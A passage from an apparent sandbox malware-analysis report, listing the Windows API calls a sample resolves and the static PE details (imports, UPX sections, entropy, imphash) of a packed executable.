  2391. "ntdll.dll.NtQueryInformationThread",
  2392. "ntdll.dll.NtQueryMutant",
  2393. "ntdll.dll.NtSystemDebugControl",
  2394. "ntdll.dll.RtlFreeHeap",
  2395. "ntdll.dll.RtlGetFunctionTableListHead",
  2396. "ntdll.dll.RtlGetUnloadEventTrace",
  2397. "ntdll.dll.RtlGetUnloadEventTraceEx",
  2398. "ntdll.dll.NtOpenProcessToken",
  2399. "ntdll.dll.NtOpenThreadToken",
  2400. "ntdll.dll.NtQueryInformationToken",
  2401. "ntdll.dll.NtClose",
  2402. "powrprof.dll.CallNtPowerInformation",
  2403. "kernel32.dll.ExitThread",
  2404. "kernel32.dll.SetFileAttributesW",
  2405. "kernel32.dll.FreeConsole",
  2406. "kernel32.dll.GetConsoleWindow",
  2407. "kernel32.dll.SetThreadAffinityMask",
  2408. "kernel32.dll.SetThreadPriority",
  2409. "kernel32.dll.FlushInstructionCache",
  2410. "kernel32.dll.PostQueuedCompletionStatus",
  2411. "kernel32.dll.GetQueuedCompletionStatusEx",
  2412. "kernel32.dll.CreateIoCompletionPort",
  2413. "kernel32.dll.SetConsoleTextAttribute",
  2414. "kernel32.dll.RegisterWaitForSingleObject",
  2415. "kernel32.dll.UnregisterWait",
  2416. "kernel32.dll.GetConsoleCursorInfo",
  2417. "kernel32.dll.QueueUserWorkItem",
  2418. "kernel32.dll.SetConsoleCursorInfo",
  2419. "kernel32.dll.ReadConsoleInputW",
  2420. "kernel32.dll.WriteConsoleInputW",
  2421. "kernel32.dll.FillConsoleOutputAttribute",
  2422. "kernel32.dll.GetNumberOfConsoleInputEvents",
  2423. "kernel32.dll.GetShortPathNameW",
  2424. "kernel32.dll.ReadDirectoryChangesW",
  2425. "kernel32.dll.QueryPerformanceFrequency",
  2426. "kernel32.dll.IsValidLocale",
  2427. "kernel32.dll.CreateDirectoryW",
  2428. "kernel32.dll.RemoveDirectoryW",
  2429. "kernel32.dll.GetFinalPathNameByHandleW",
  2430. "kernel32.dll.SetFileTime",
  2431. "kernel32.dll.ReOpenFile",
  2432. "kernel32.dll.CreateHardLinkW",
  2433. "kernel32.dll.MoveFileExW",
  2434. "kernel32.dll.CopyFileW",
  2435. "kernel32.dll.SleepConditionVariableCS",
  2436. "kernel32.dll.WakeConditionVariable",
  2437. "kernel32.dll.InitializeConditionVariable",
  2438. "kernel32.dll.CancelIo",
  2439. "kernel32.dll.SetFileCompletionNotificationModes",
  2440. "kernel32.dll.SetNamedPipeHandleState",
  2441. "kernel32.dll.CreateNamedPipeW",
  2442. "kernel32.dll.PeekNamedPipe",
  2443. "kernel32.dll.CancelSynchronousIo",
  2444. "kernel32.dll.GetNamedPipeHandleStateA",
  2445. "kernel32.dll.CancelIoEx",
  2446. "kernel32.dll.SwitchToThread",
  2447. "kernel32.dll.ConnectNamedPipe",
  2448. "kernel32.dll.UnregisterWaitEx",
  2449. "kernel32.dll.GetExitCodeProcess",
  2450. "kernel32.dll.EnumSystemLocalesW",
  2451. "kernel32.dll.FindFirstFileExA",
  2452. "kernel32.dll.GetLocaleInfoW",
  2453. "kernel32.dll.ResetEvent",
  2454. "kernel32.dll.InitializeSListHead",
  2455. "kernel32.dll.GetThreadTimes",
  2456. "kernel32.dll.FreeLibraryAndExitThread",
  2457. "advapi32.dll.CryptGenRandom",
  2458. "advapi32.dll.LsaAddAccountRights",
  2459. "user32.dll.MapVirtualKeyW",
  2460. "ws2_32.dll.#112",
  2461. "ws2_32.dll.WSARecvFrom",
  2462. "ws2_32.dll.#22",
  2463. "ws2_32.dll.#7",
  2464. "ws2_32.dll.#111",
  2465. "kernel32.dll.InitOnceExecuteOnce",
  2466. "kernel32.dll.GetFileInformationByHandleEx",
  2467. "kernel32.dll.SetFileInformationByHandle",
  2468. "kernel32.dll.WakeAllConditionVariable",
  2469. "kernel32.dll.InitializeSRWLock",
  2470. "kernel32.dll.AcquireSRWLockExclusive",
  2471. "kernel32.dll.TryAcquireSRWLockExclusive",
  2472. "kernel32.dll.ReleaseSRWLockExclusive",
  2473. "kernel32.dll.SleepConditionVariableSRW",
  2474. "kernel32.dll.CreateThreadpoolWork",
  2475. "kernel32.dll.SubmitThreadpoolWork",
  2476. "kernel32.dll.CloseThreadpoolWork",
  2477. "ntdll.dll.RtlGetVersion",
  2478. "ntdll.dll.RtlNtStatusToDosError",
  2479. "ntdll.dll.NtDeviceIoControlFile",
  2480. "ntdll.dll.NtQueryInformationFile",
  2481. "ntdll.dll.NtSetInformationFile",
  2482. "ntdll.dll.NtQueryVolumeInformationFile",
  2483. "ntdll.dll.NtQueryDirectoryFile",
  2484. "user32.dll.SetWinEventHook",
  2485. "wersvc.dll.ServiceMain",
  2486. "wersvc.dll.SvchostPushServiceGlobals"
  2487. ]
  2488.  
  2489. [*] Static Analysis: {
  2490. "pe": {
  2491. "peid_signatures": null,
  2492. "imports": [
  2493. {
  2494. "imports": [
  2495. {
  2496. "name": "RegCloseKey",
  2497. "address": "0xa9e154"
  2498. }
  2499. ],
  2500. "dll": "ADVAPI32.dll"
  2501. },
  2502. {
  2503. "imports": [
  2504. {
  2505. "name": null,
  2506. "address": "0xa9e15c"
  2507. }
  2508. ],
  2509. "dll": "COMCTL32.dll"
  2510. },
  2511. {
  2512. "imports": [
  2513. {
  2514. "name": "ChooseColorA",
  2515. "address": "0xa9e164"
  2516. }
  2517. ],
  2518. "dll": "comdlg32.dll"
  2519. },
  2520. {
  2521. "imports": [
  2522. {
  2523. "name": "Escape",
  2524. "address": "0xa9e16c"
  2525. }
  2526. ],
  2527. "dll": "GDI32.dll"
  2528. },
  2529. {
  2530. "imports": [
  2531. {
  2532. "name": "GetAdaptersInfo",
  2533. "address": "0xa9e174"
  2534. }
  2535. ],
  2536. "dll": "iphlpapi.dll"
  2537. },
  2538. {
  2539. "imports": [
  2540. {
  2541. "name": "LoadLibraryA",
  2542. "address": "0xa9e17c"
  2543. },
  2544. {
  2545. "name": "ExitProcess",
  2546. "address": "0xa9e180"
  2547. },
  2548. {
  2549. "name": "GetProcAddress",
  2550. "address": "0xa9e184"
  2551. },
  2552. {
  2553. "name": "VirtualProtect",
  2554. "address": "0xa9e188"
  2555. }
  2556. ],
  2557. "dll": "KERNEL32.DLL"
  2558. },
  2559. {
  2560. "imports": [
  2561. {
  2562. "name": "OleRun",
  2563. "address": "0xa9e190"
  2564. }
  2565. ],
  2566. "dll": "ole32.dll"
  2567. },
  2568. {
  2569. "imports": [
  2570. {
  2571. "name": "VariantCopy",
  2572. "address": "0xa9e198"
  2573. }
  2574. ],
  2575. "dll": "OLEAUT32.dll"
  2576. },
  2577. {
  2578. "imports": [
  2579. {
  2580. "name": "RasHangUpA",
  2581. "address": "0xa9e1a0"
  2582. }
  2583. ],
  2584. "dll": "RASAPI32.dll"
  2585. },
  2586. {
  2587. "imports": [
  2588. {
  2589. "name": "ShellExecuteA",
  2590. "address": "0xa9e1a8"
  2591. }
  2592. ],
  2593. "dll": "SHELL32.dll"
  2594. },
  2595. {
  2596. "imports": [
  2597. {
  2598. "name": "GetDC",
  2599. "address": "0xa9e1b0"
  2600. }
  2601. ],
  2602. "dll": "USER32.dll"
  2603. },
  2604. {
  2605. "imports": [
  2606. {
  2607. "name": "VerQueryValueA",
  2608. "address": "0xa9e1b8"
  2609. }
  2610. ],
  2611. "dll": "VERSION.dll"
  2612. },
  2613. {
  2614. "imports": [
  2615. {
  2616. "name": "InternetOpenA",
  2617. "address": "0xa9e1c0"
  2618. }
  2619. ],
  2620. "dll": "WININET.dll"
  2621. },
  2622. {
  2623. "imports": [
  2624. {
  2625. "name": "waveOutOpen",
  2626. "address": "0xa9e1c8"
  2627. }
  2628. ],
  2629. "dll": "WINMM.dll"
  2630. },
  2631. {
  2632. "imports": [
  2633. {
  2634. "name": "OpenPrinterA",
  2635. "address": "0xa9e1d0"
  2636. }
  2637. ],
  2638. "dll": "WINSPOOL.DRV"
  2639. },
  2640. {
  2641. "imports": [
  2642. {
  2643. "name": "recvfrom",
  2644. "address": "0xa9e1d8"
  2645. }
  2646. ],
  2647. "dll": "WS2_32.dll"
  2648. }
  2649. ],
  2650. "digital_signers": null,
  2651. "exported_dll_name": null,
  2652. "actual_checksum": "0x00539452",
  2653. "overlay": null,
  2654. "imagebase": "0x00400000",
  2655. "reported_checksum": "0x00000000",
  2656. "icon_hash": null,
  2657. "entrypoint": "0x00a9d5b0",
  2658. "timestamp": "2019-06-24 19:13:25",
  2659. "osversion": "4.0",
  2660. "sections": [
  2661. {
  2662. "name": "UPX0",
  2663. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2664. "virtual_address": "0x00001000",
  2665. "size_of_data": "0x00000000",
  2666. "entropy": "0.00",
  2667. "raw_address": "0x00000400",
  2668. "virtual_size": "0x00170000",
  2669. "characteristics_raw": "0xe0000080"
  2670. },
  2671. {
  2672. "name": "UPX1",
  2673. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2674. "virtual_address": "0x00171000",
  2675. "size_of_data": "0x0052c800",
  2676. "entropy": "7.82",
  2677. "raw_address": "0x00000400",
  2678. "virtual_size": "0x0052d000",
  2679. "characteristics_raw": "0xe0000040"
  2680. },
  2681. {
  2682. "name": "UPX2",
  2683. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  2684. "virtual_address": "0x0069e000",
  2685. "size_of_data": "0x00000400",
  2686. "entropy": "3.70",
  2687. "raw_address": "0x0052cc00",
  2688. "virtual_size": "0x00001000",
  2689. "characteristics_raw": "0xc0000040"
  2690. }
  2691. ],
  2692. "resources": [],
  2693. "dirents": [
  2694. {
  2695. "virtual_address": "0x00000000",
  2696. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2697. "size": "0x00000000"
  2698. },
  2699. {
  2700. "virtual_address": "0x0069e000",
  2701. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2702. "size": "0x0000037c"
  2703. },
  2704. {
  2705. "virtual_address": "0x00000000",
  2706. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2707. "size": "0x00000000"
  2708. },
  2709. {
  2710. "virtual_address": "0x00000000",
  2711. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2712. "size": "0x00000000"
  2713. },
  2714. {
  2715. "virtual_address": "0x00000000",
  2716. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2717. "size": "0x00000000"
  2718. },
  2719. {
  2720. "virtual_address": "0x00000000",
  2721. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2722. "size": "0x00000000"
  2723. },
  2724. {
  2725. "virtual_address": "0x00000000",
  2726. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2727. "size": "0x00000000"
  2728. },
  2729. {
  2730. "virtual_address": "0x00000000",
  2731. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2732. "size": "0x00000000"
  2733. },
  2734. {
  2735. "virtual_address": "0x00000000",
  2736. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2737. "size": "0x00000000"
  2738. },
  2739. {
  2740. "virtual_address": "0x00000000",
  2741. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2742. "size": "0x00000000"
  2743. },
  2744. {
  2745. "virtual_address": "0x00000000",
  2746. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2747. "size": "0x00000000"
  2748. },
  2749. {
  2750. "virtual_address": "0x00000000",
  2751. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2752. "size": "0x00000000"
  2753. },
  2754. {
  2755. "virtual_address": "0x00000000",
  2756. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2757. "size": "0x00000000"
  2758. },
  2759. {
  2760. "virtual_address": "0x00000000",
  2761. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2762. "size": "0x00000000"
  2763. },
  2764. {
  2765. "virtual_address": "0x00000000",
  2766. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2767. "size": "0x00000000"
  2768. },
  2769. {
  2770. "virtual_address": "0x00000000",
  2771. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2772. "size": "0x00000000"
  2773. }
  2774. ],
  2775. "exports": [],
  2776. "guest_signers": {},
  2777. "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
  2778. "icon_fuzzy": null,
  2779. "icon": null,
  2780. "pdbpath": null,
  2781. "imported_dll_count": 16,
  2782. "versioninfo": []
  2783. }
  2784. }